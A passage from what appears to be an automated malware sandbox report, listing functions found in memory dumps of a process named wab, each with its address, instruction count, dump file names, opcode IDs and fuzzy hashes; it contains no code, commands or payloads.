                                                          • Opcode Fuzzy Hash: 36afe7a0168629c0ebbd6105f157e52802566fc445eee1cc54520c4f34def9cb
                                                          • Instruction Fuzzy Hash: C631A530A007099BDB25DF75C48069EBBF2FF89304F148929E505FB651EBB1E946CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF57E8 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ecb3b8a3a12b8526ce097dde8f7ce85725780fdf5ef9bf6cf9fecf96f3961a57
                                                          • Instruction ID: cff5cfdef17d61de700f8753d605c6d8d2b20cf2fb9e4b26dbfef7cadba38d72
                                                          • Opcode Fuzzy Hash: ecb3b8a3a12b8526ce097dde8f7ce85725780fdf5ef9bf6cf9fecf96f3961a57
                                                          • Instruction Fuzzy Hash: 0B315D70E016059BCB15CFB5C49469EBBF2FF89310F508529E816FB351EB72A986CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFB370 Relevance: .1, Instructions: 95COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd2dd96dbe57839f7267d2c4134d645bdd3e1dad8d5fbcc7f7caff8bd088888e
                                                          • Instruction ID: ec0595d09bd676e4b3b3fc46f5f0302071d79a31dcb0aed0cb26f6630475f52b
                                                          • Opcode Fuzzy Hash: cd2dd96dbe57839f7267d2c4134d645bdd3e1dad8d5fbcc7f7caff8bd088888e
                                                          • Instruction Fuzzy Hash: 4331A130E40209DBDB65CFA9C85079EB7B2FF89308F10D529E901FB240E7B19941CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF89D0 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ea073289d4660828ade99f2e9763bc58ec3bde7f9712bb61445e3278f9ac01a
                                                          • Instruction ID: 1efda94133163107c21f083b55597a506eff156a49fa0143cf8fe74ffb385843
                                                          • Opcode Fuzzy Hash: 0ea073289d4660828ade99f2e9763bc58ec3bde7f9712bb61445e3278f9ac01a
                                                          • Instruction Fuzzy Hash: 6931A831A012058FDB20AFA9C8C075FFBB1FB59310F31887AE519D7252DA36D942CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF57F8 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72b66f6b2b228d14bae05aac2a4aa592ec93eeccee2c266db6b04a97cd493f0f
                                                          • Instruction ID: 2b0a6cccefa4ff378d3d19003eba7e0d20ed042ae25242e36eae964e8b9651b1
                                                          • Opcode Fuzzy Hash: 72b66f6b2b228d14bae05aac2a4aa592ec93eeccee2c266db6b04a97cd493f0f
                                                          • Instruction Fuzzy Hash: 0F313E70E006059BCB15CFB9C49469EB7F2BF89300F508529E816FB351DB76AD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF2711 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59fe87c0f9b55623808f8fd519d6db996171580534f7e868adc2143d4024f045
                                                          • Instruction ID: 262ec28a4ebf2c7bf0e6471a75c6c91fe2e5dc133b8739f65c66b15ca95dc135
                                                          • Opcode Fuzzy Hash: 59fe87c0f9b55623808f8fd519d6db996171580534f7e868adc2143d4024f045
                                                          • Instruction Fuzzy Hash: 2241E1B1D00349DFEB10CFA9C584ADEBBB5FF48314F548029E909AB254DB759949CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF2718 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a7ed5de18aaf09afa0b4f358173cc6762353007e9012b1b851c339c6c66c19f
                                                          • Instruction ID: 899d12b2ca1700b282a7ba58999ad8ff2f28006ad108ed8f3d3e57bc7b3f47fb
                                                          • Opcode Fuzzy Hash: 5a7ed5de18aaf09afa0b4f358173cc6762353007e9012b1b851c339c6c66c19f
                                                          • Instruction Fuzzy Hash: 5A41FEB1D0034DDFEB10CFA9C884ADEBBF5EF48314F14802AE909AB254DB75A945CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFB366 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ac71470b63fc29e0bda4d1ac3eb51a63396fed5b411518e235aa360a6fa3548
                                                          • Instruction ID: c5ea96f8a3a77bb1cfdfd6e1e5ba021b5d5d39a7aab7434f0777fc31e0d39a46
                                                          • Opcode Fuzzy Hash: 6ac71470b63fc29e0bda4d1ac3eb51a63396fed5b411518e235aa360a6fa3548
                                                          • Instruction Fuzzy Hash: 28316D30E512099BDB65CF65C55479EBBB2EF99308F20942EE901FB250E7B19941CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF50C8 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6fc31a6f06bba266f5c491b63c9bbb97cbe51ef25ef4ca0b6ec8363f52e847e
                                                          • Instruction ID: b3b74eefb7990f28ef0b78ff41cf6d80092088db03e8034d4914feea28d82343
                                                          • Opcode Fuzzy Hash: e6fc31a6f06bba266f5c491b63c9bbb97cbe51ef25ef4ca0b6ec8363f52e847e
                                                          • Instruction Fuzzy Hash: D9316C34A40214CFDB68EB74C5906AE77F2AF99308F905568DA05EB390DB7ADC01CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF1383 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be49e75f87948c6d15610ce8bfa4f71258596065f5b7e0de8a7bb70211e51ea4
                                                          • Instruction ID: ef28372bb9a4f2d3c977121723a8c1c96e439a29d900e54f9b4b23b354f6c8ae
                                                          • Opcode Fuzzy Hash: be49e75f87948c6d15610ce8bfa4f71258596065f5b7e0de8a7bb70211e51ea4
                                                          • Instruction Fuzzy Hash: 0F21B070A412158FDFB45A34C49477C3BA5EB8A32AF51586AE60ECB780DB2DCC818706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF14C3 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd157bd3da0d00f24949a23f028d20596d3e1231430b92c430aa752169ffb190
                                                          • Instruction ID: bf92686ed57ae5fd2e29811dbd9ead1e648cf87c4ae8a79644913f7d3d38c36d
                                                          • Opcode Fuzzy Hash: bd157bd3da0d00f24949a23f028d20596d3e1231430b92c430aa752169ffb190
                                                          • Instruction Fuzzy Hash: 27219271A40215CFCFA0DB78C4503AD37F6EB88219F519479EA0ADF301EB35C9418B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF50D8 Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5d12ae5c9a1623d63263b48a4f5284bef6db4dc38b033c1c5631c0e715064ae
                                                          • Instruction ID: 35ea4f5870b1f31f1f3f575b19c3c787251a16f96e9b35447452386a21c7eab0
                                                          • Opcode Fuzzy Hash: d5d12ae5c9a1623d63263b48a4f5284bef6db4dc38b033c1c5631c0e715064ae
                                                          • Instruction Fuzzy Hash: EB213E34B40214CFDB68EB34C5506AE77F3AF99348B908468DA05EB390DB7ADC01CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF72E8 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6840ecc95662b5cd8c2ceb7a9d3d2b10d192b25147438a616f165e8c84ba494
                                                          • Instruction ID: 8da015e518306a3e4c8b7e709a011ccaa925ec326fc514b26c41499db40409fc
                                                          • Opcode Fuzzy Hash: e6840ecc95662b5cd8c2ceb7a9d3d2b10d192b25147438a616f165e8c84ba494
                                                          • Instruction Fuzzy Hash: F9216D75F012249FDB00DF69D981B9EBBF2FB48710F10816AEA04E7390EB75D9408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF72F8 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e273d722813519656f0abcff1364adeccff2c81f5e379544f63e105ac62532e3
                                                          • Instruction ID: f29f45ca5740abf109dff5242b901457fb3168107b56d7e403c2e28343187e62
                                                          • Opcode Fuzzy Hash: e273d722813519656f0abcff1364adeccff2c81f5e379544f63e105ac62532e3
                                                          • Instruction Fuzzy Hash: D6213B75E012249FDB00DF69D980B9EBBF6FB88710F108139EA04E7380EB35D9408BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF6BD1 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa82177ac724ab3158dadb79c91037eaf2c51cfd29f1cf65acbe6b6a784fed61
                                                          • Instruction ID: 3f6a600259b3fdff4a412ee47ff43e774e17f28c0cbe0a65854f678dccc93a32
                                                          • Opcode Fuzzy Hash: fa82177ac724ab3158dadb79c91037eaf2c51cfd29f1cf65acbe6b6a784fed61
                                                          • Instruction Fuzzy Hash: 3F2124317043148FCB02A7B8D4116EE3BF2EF8A311B5480EBD655DB797EA758C4987A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFD658 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c2002dccff144e83dfe69f10617635c8a77ea28f2ee37b7e34a977063e877a53
                                                          • Instruction ID: f77f8ad86838e1b09f7099c9c26cc6a7b7d87e5c2e69982eccdab8bc5608b2b6
                                                          • Opcode Fuzzy Hash: c2002dccff144e83dfe69f10617635c8a77ea28f2ee37b7e34a977063e877a53
                                                          • Instruction Fuzzy Hash: 47215C70E002099BDB15CFA9D89479EFBB2FF89304F50D619E905FB241EB71A885CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFA549 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03e392f8ef5b06ed9b4c9f705a2cc3904429f29687a3c3d80e0f38532d29f06f
                                                          • Instruction ID: df5fa9769042cf2598b82e44b93d4f5f12babadd8bc4d3b5f2604c5de28fffd4
                                                          • Opcode Fuzzy Hash: 03e392f8ef5b06ed9b4c9f705a2cc3904429f29687a3c3d80e0f38532d29f06f
                                                          • Instruction Fuzzy Hash: 0F21A131B021089BDF04CA69E9907CEBBB7FF98314F548435E506EB351DA72ED528B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFD140 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 442a4c41b9d0008e0f88ab31150cbde78ddb3daa18d9b11cbb66fc1b994de597
                                                          • Instruction ID: 460b293e4292cfa6175ed6ceb23911fcde4bdc4865aea943dd10e475a55fdd8b
                                                          • Opcode Fuzzy Hash: 442a4c41b9d0008e0f88ab31150cbde78ddb3daa18d9b11cbb66fc1b994de597
                                                          • Instruction Fuzzy Hash: 6921A130E407099BDB15CFA5D8946DEBBB2EF89304F10C61AE915F7250EB71A945CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF16D3 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b840f8ba2d0a9955ac6dac051378f70ffc71542bef7444a7aa22e1dd4f520ec6
                                                          • Instruction ID: 48320d29981a1cde0de615bd812231f298ee544c6fa0d71a2b63ab60ef9c2a69
                                                          • Opcode Fuzzy Hash: b840f8ba2d0a9955ac6dac051378f70ffc71542bef7444a7aa22e1dd4f520ec6
                                                          • Instruction Fuzzy Hash: 6C2171306042448FEF61D734C894B6937A6EF4A315F50996AE30ECF791DBB8DC458B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF4FB9 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed80684965a8d53f49f1cebaad6151fb329862a64d99a4d4d974903c039d0e3a
                                                          • Instruction ID: f61d76d24bfdfa0fa7ba8bdaecefdff36fdad625149ca86a8204d907aeda6f63
                                                          • Opcode Fuzzy Hash: ed80684965a8d53f49f1cebaad6151fb329862a64d99a4d4d974903c039d0e3a
                                                          • Instruction Fuzzy Hash: D8211734A80104CFDB54DB75D558AAE77F2AF89304BA048A8E606EB3A0DB769D41CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF17F0 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca78d32db0961a25309998619bad0a745df3b0f1c2c72f0d4d84500def1b544f
                                                          • Instruction ID: 85510a7e2949b0054367be4cb40bbc83881177da8303f1026295658f9bc0ac99
                                                          • Opcode Fuzzy Hash: ca78d32db0961a25309998619bad0a745df3b0f1c2c72f0d4d84500def1b544f
                                                          • Instruction Fuzzy Hash: 4F213676F002558FDF209B78C84479E7BE6AF88255F50483AEA0EDB340EB78CC018B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02ECD110 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2626825826.0000000002ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ECD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ecd000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3baac65a3dd9eea5af169516f2b4a7b775b1f554f64c19f265c0a6527ad70f2a
                                                          • Instruction ID: 905752d38f6a9ca5f944aa2a8931f8fa2c6bb6f2c11e8386d098d1021d1fd62e
                                                          • Opcode Fuzzy Hash: 3baac65a3dd9eea5af169516f2b4a7b775b1f554f64c19f265c0a6527ad70f2a
                                                          • Instruction Fuzzy Hash: 1221A1B56442449FDB04DF50DAC0B26BB65EB88218F34C5BDD8494B346C777D847CA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFD150 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b15ced47ef7cff2b999efb2d3834db4e3c10ad63271d8c0f6dca73114487172c
                                                          • Instruction ID: 08039004548e88b9bd89c9231067fd3cb5078f7ecc8a0a5e2567a07636ec400d
                                                          • Opcode Fuzzy Hash: b15ced47ef7cff2b999efb2d3834db4e3c10ad63271d8c0f6dca73114487172c
                                                          • Instruction Fuzzy Hash: BF216230E406099BDB19CFA5D8546DEFBB2AF89304F10C61AE915F7350EB71A846CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF18A9 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbfad891000be054b93b4c7f83da6cce13aa6b6ef58cdf31207e07d3b8478fc2
                                                          • Instruction ID: 742c5bd9bafa235d8c18dd6b4559575c3bf7c96e770f0d380b8a4836162e6d1c
                                                          • Opcode Fuzzy Hash: dbfad891000be054b93b4c7f83da6cce13aa6b6ef58cdf31207e07d3b8478fc2
                                                          • Instruction Fuzzy Hash: FE214830A40249CFEBA4DB74C5557ED73B2AF49308F509868D60AEF290EB3A8D01CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF18B8 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a00c93aaa60847383175e434449e865b779ec75c3ffd89b4d0a70f26c5b3fc5
                                                          • Instruction ID: aafb53a035eb399fd2df1aecdc9f9cbaaa0034c7cae92f0ae366258a8adcc594
                                                          • Opcode Fuzzy Hash: 0a00c93aaa60847383175e434449e865b779ec75c3ffd89b4d0a70f26c5b3fc5
                                                          • Instruction Fuzzy Hash: F0211630B40249CFDBA4EB74C5557AE77F2AF89248F509468D60AEB290EB768D40CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF16E0 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8de0762f80d3fec6f26e4c1900b7273e50105eb10492d0aa2e3f8b742fdc15ac
                                                          • Instruction ID: 66113272c75ef9ca8e7a0342380810bf27bdd6d95658aad899293f941a81537d
                                                          • Opcode Fuzzy Hash: 8de0762f80d3fec6f26e4c1900b7273e50105eb10492d0aa2e3f8b742fdc15ac
                                                          • Instruction Fuzzy Hash: 76217F346402048FEF60D768D894B6937A6EF4A319F509965E30ECF391DBBCDC858BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF4FC8 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64a5e3633a46f1658f48c4bfc3783e2e713f2b2456e62c2d81d4cb71c90ba3e2
                                                          • Instruction ID: c4343ca8f58cf50d22bac004a5cff0150ea868d381e296bfdbc3a2db87ce504a
                                                          • Opcode Fuzzy Hash: 64a5e3633a46f1658f48c4bfc3783e2e713f2b2456e62c2d81d4cb71c90ba3e2
                                                          • Instruction Fuzzy Hash: E621E934B80204CFDB54DB79D558BAD77F2AF89304F9048A8E606EB3A0DB769D41CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF0848 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09b42ecb8e823ddd0bb55cd8a5cdabf8b8d3e707923af8ff7686a9baf0983943
                                                          • Instruction ID: 0c7ea403733357f2fa7371b2397429971a28d937fb1c073233e545f5a67199a5
                                                          • Opcode Fuzzy Hash: 09b42ecb8e823ddd0bb55cd8a5cdabf8b8d3e707923af8ff7686a9baf0983943
                                                          • Instruction Fuzzy Hash: AE11C630B803088BEFA49B79C44476A7395EB85218F50D979D206DF34ADB74CC868BC1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EF083B Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d74c1f8da1e258ca2db4fb69397cce8febadca6374e097927f1237ef90ef8a1
                                                          • Instruction ID: 51579efad7d27f4506ba786a298216c7261d98c850550d4744480017d1d43dfd
                                                          • Opcode Fuzzy Hash: 7d74c1f8da1e258ca2db4fb69397cce8febadca6374e097927f1237ef90ef8a1
                                                          • Instruction Fuzzy Hash: 3911C230A803444BEFA15BB4C8503BE7B51EB85218F54D9BAD642DF24BDB74CD868BD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7640 Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 264214125cb7a98e8242b5b646624d458c469729690d0437f170e23b356ab4cb
                                                          • Instruction ID: 5cbd0307cda6a2957b32f7659b6f2c836200f0596cd5fb066cfcedf321f3eb15
                                                          • Opcode Fuzzy Hash: 264214125cb7a98e8242b5b646624d458c469729690d0437f170e23b356ab4cb
                                                          • Instruction Fuzzy Hash: F11192B17052804FDB468A7C989474A7BD6DBEE311F14447EF00ADB393DE26DD428791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AF7408 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccf4e457ac1c0332379b9e698ae9b39d2661ae17e6f4c8dc5536654f8206ab11
                                                          • Instruction ID: 74aeb9d6d3ec3efb65449ac46983b97c71736463fd7ca2e438fd458802b9537f
